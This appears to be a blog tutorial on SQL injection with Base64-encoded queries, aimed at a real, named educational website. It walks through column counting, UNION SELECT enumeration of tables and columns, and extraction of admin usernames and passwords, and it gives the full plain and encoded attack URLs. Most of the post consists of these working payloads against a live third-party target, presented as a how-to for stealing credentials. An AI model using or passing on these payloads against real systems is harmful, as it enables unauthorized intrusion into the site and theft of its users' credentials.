SQL Injection using Base64 Encoded Quires
23:09
Hello! I hope you are fine today i gonna teach you how we can inject website using Base64 Encode Quries so lets start.
I have already Base64 injection website
http://aimschennai.in/viewpost.php?id=6Ok how we know that this website base 64 yes or no when we try to find order simple using order by we if we got error its mean this website maybe base 64 Like this
- you can see this when i used order by statement we i got SQLI Errors.
- Now select vulnerable id or order by statement.
6 order by 1 (Encoding) No error
Click Base64 Encode and Execute
when we encode this you can see this we don't got any error
Now use this method find orders6 order by 2 (Encoding) No error6 order by 3 (Encoding) No error6 order by 4 (Encoding) No error
- 6 order by 10 (Encoding) Error See screen short
- we got 8 orders so now use union select statement or Encode this
Click Base64 Encode then execute this website
you can see this we got table number now simply use table queries or encode this query
Example of Encoding
Simple Query: http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_Schema=database()--+-
Encoded:
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDQsNSw2LDcsOCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfU2NoZW1hPWRhdGFiYXNlKCktLSAt
Got table data copy aims_user or find columns simply sqli quries
Decode Queries or find table data
Simple :
http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=CHAR(97, 105, 109, 115, 95, 117, 115, 101, 114)-- -
Encode :
Encode :
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSw0LDUsNiw3LDggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPUNIQVIoOTcsIDEwNSwgMTA5LCAxMTUsIDk1LCAxMTcsIDExNSwgMTAxLCAxMTQpLS0gLQ==
Got all columns now we need admin user or password use simple SQLI queries or Encode this.
Simple :
http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(am_username,0x3a,am_password),4,5,6,7,8 from aims_user
Encode :
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGFtX3VzZXJuYW1lLDB4M2EsYW1fcGFzc3dvcmQpLDQsNSw2LDcsOCBmcm9tIGFpbXNfdXNlcg==
Finally we got Admin Users or Password.
2 comments
Can i know what extension are you using ?
ReplyDeleteThe article seems interesting, however, having most of the content in blurry images makes it completely unusable for me. Why would you do that??? Not good, not good.
ReplyDelete